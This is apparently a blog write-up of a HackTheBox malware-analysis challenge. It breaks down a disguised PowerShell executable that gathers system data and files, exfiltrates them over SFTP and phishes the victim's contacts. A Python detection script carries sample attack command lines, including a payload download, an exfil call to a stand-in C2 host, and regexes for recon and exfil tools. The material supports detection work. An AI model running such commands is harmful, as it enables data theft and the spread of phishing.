Introduction

Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary’s capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.

This is an Easy-rated Malware Analysis challenge. We are given HeartBreakerContinuum.zip, which contains the binary.
Challenge Link: https://app.hackthebox.com/sherlocks/Heartbreaker-Continuum

Walkthrough

Extracting the ZIP yields a Superstar_MemberCard.tiff.exe file. If file extensions are hidden, this could fool a user into thinking the file is an image. Some of the information in my analysis is the answer to a challenge task, so those values have been masked (hash, C2 servers, staging dir). If you complete the challenge yourself, the password to the C2 server used for exfiltration will also unlock my step-by-step walkthrough of the tasks.

File Metadata Summary

Using a combination of exiftool, detect-it-easy and file, we can gather the following information:

  • 41 KB PE32 Win32 executable
  • File Creation Date/Time: 2024-03-13 10:38:06
  • File Modification Date/Time: 2024-05-13 17:02:36
  • SHA256: 12daa34111bb54b3dcbad4230[…]c3842f015cccbbe6564d9dfd3ea3
  • Linker: Microsoft Linker (11.0)
  • Library: .NET Framework
  • Language: PowerShell
  • Packer: PS2EXE

PowerShell Static Analysis

After de-obfuscating the script using CyberChef, it is clearly a reconnaissance and exfiltration script, with a phishing twist at the end to further propagate the malware to other users.

  1. The script sets variables for the hostname, current user, stage 1 payload URL and output destination
  2. The stage 1 file is retrieved from hxxp://44.206.187[.]xxx:9000/Superstar_MemberCard.tiff and saved to \Downloads\Superstar_MemberCard.tiff
  3. The script then scans C:\Users and writes the user names it finds to <staging_dir>\username.txt
  4. nltest, Get-WmiObject Win32_UserAccount and wmic are used to collect domain info, local users and antivirus info into DCInfo.txt, localusers.txt and AVinfo.txt, respectively, in the same directory
  5. A listing of all processes the user is currently running is saved to <staging_dir>\UserProcesses.txt
  6. If Outlook is running, the script attempts to force-kill it
  7. The script scans for all document files (.xlsx, .docx, .csv, .pptx …) and email files (.msg, .eml, .pst …) in C:\Users and dumps them into <staging_dir>
  8. Get-SmbShare and gpresult are run and their output saved to Shareinfo.txt and Gpinfo.txt
  9. All files from steps 3-8 are zipped into <staging_dir>\<hostname>.zip
  10. WinSCP Portable is downloaded from SoftRadar.com to C:\Users\Public\HelpDesk-Tools using Invoke-WebRequest and a spoofed wget user-agent.
  11. A maintenanceScript.txt file for WinSCP is modified to open an SFTP connection as [email protected][.]xxx and send the <hostname>.zip file
  12. Outlook is opened and a phishing email is crafted. The message body contains a link to the executable analysed here, and the mail is BCC'd to all contacts
  13. WinSCP and the <staging_dir> are removed
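As an added example (not part of this write-up or the challenge files), a small Python triage script that correlates PowerShell ScriptBlock-logging text (the body of event 4104) against the stages listed above. A single recon command is routine admin work; the alert fires only when one host chains several stages and includes a transfer step. The sample blocks, hostnames and paths are constructed; only the defanged stage 1 address is taken from the walkthrough.

```python
import re

# Constructed sample ScriptBlock-logging text as (hostname, script_text). Hosts, paths and
# the SFTP target are invented to mirror the walkthrough's stages; none come from the real sample.
SAMPLE_BLOCKS = [
    ("WS01", r'Invoke-WebRequest -Uri "hxxp://44.206.187[.]xxx:9000/Superstar_MemberCard.tiff" -OutFile "$env:USERPROFILE\Downloads\Superstar_MemberCard.tiff"'),
    ("WS01", r"nltest /dclist: | Out-File C:\Users\Public\stage\DCInfo.txt"),
    ("WS01", r"Get-WmiObject Win32_UserAccount | Out-File C:\Users\Public\stage\localusers.txt"),
    ("WS01", r"Get-Process | Out-File C:\Users\Public\stage\UserProcesses.txt; Stop-Process -Name outlook -Force"),
    ("WS01", r"Get-ChildItem C:\Users -Recurse -Include *.docx,*.xlsx,*.pst,*.msg | Copy-Item -Destination C:\Users\Public\stage"),
    ("WS01", r"Compress-Archive -Path C:\Users\Public\stage\* -DestinationPath C:\Users\Public\stage\WS01.zip"),
    ("WS01", r"Invoke-WebRequest -UserAgent 'Wget/1.21' -Uri 'https://example.invalid/WinSCP-Portable.zip' -OutFile C:\Users\Public\HelpDesk-Tools\winscp.zip"),
    ("WS01", r"& C:\Users\Public\HelpDesk-Tools\WinSCP.com /script=maintenanceScript.txt  # opens sftp://user@c2.invalid"),
    ("WS01", r"Remove-Item C:\Users\Public\HelpDesk-Tools -Recurse -Force"),
    ("WS02", r"Get-SmbShare | Out-File \\fs01\audit\shares.txt"),  # lone admin check, benign
]

# Behaviour rules: (stage tag, regex). Each maps to one step of the script's kill chain.
RULES = [
    ("recon",      re.compile(r"\b(nltest|gpresult|wmic|Get-SmbShare|Win32_UserAccount)\b", re.I)),
    ("collect",    re.compile(r"Get-ChildItem.*-Include[^|]*\.(docx|xlsx|pst|msg|eml|csv|pptx)", re.I)),
    ("kill_mail",  re.compile(r"(Stop-Process|taskkill).*outlook", re.I)),
    ("archive",    re.compile(r"\bCompress-Archive\b", re.I)),
    ("tool_fetch", re.compile(r"Invoke-WebRequest.*-UserAgent\s+\S*wget", re.I)),
    ("exfil",      re.compile(r"winscp.*(sftp|/script=)", re.I)),
    ("cleanup",    re.compile(r"\bRemove-Item\b.*-Recurse", re.I)),
]
URL_RE = re.compile(r"hxxps?://\S+|https?://\S+", re.I)  # both defanged and live forms

def classify(blocks):
    """Return {host: (set_of_stage_tags, set_of_urls)} accumulated over all script blocks."""
    per_host = {}
    for host, text in blocks:
        tags, urls = per_host.setdefault(host, (set(), set()))
        tags.update(tag for tag, rx in RULES if rx.search(text))
        urls.update(u.strip("'\"") for u in URL_RE.findall(text))
    return per_host

def alerts(blocks, min_tags=4):
    """Alert only on hosts that chain several stages AND include a transfer-tool or exfil step."""
    out = {}
    for host, (tags, urls) in classify(blocks).items():
        if len(tags) >= min_tags and tags & {"exfil", "tool_fetch"}:
            out[host] = {"stages": sorted(tags), "urls": sorted(urls)}
    return out

if __name__ == "__main__":
    for host, info in alerts(SAMPLE_BLOCKS).items():
        print(host, info)
```

The extracted URLs give the stage 1 and tool-download indicators to block, and the stage list shows which steps of the chain were observed on each host.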

Task Breakdown

Restricted Content
This challenge is currently active on HackTheBox, so this section must be password protected. You will need to wait until the challenge is retired for the full solution. In special circumstances, you may email me for the password.

Conclusion

I thoroughly enjoyed this task! This was my first take on the Sherlock challenges that have been introduced on HackTheBox. Malware Analysis and Reverse Engineering is the route by which I wish to advance my cyber career, and I felt this was a really great semi-guided search by looking over the code. The tasks do a great job of walking you through each part of what to look for. I have some experience with reversing already under my belt, so my straight analysis was done before I then went back and dove into the questions.

View my completion certificate here: https://labs.hackthebox.com/achievement/sherlock/677503/699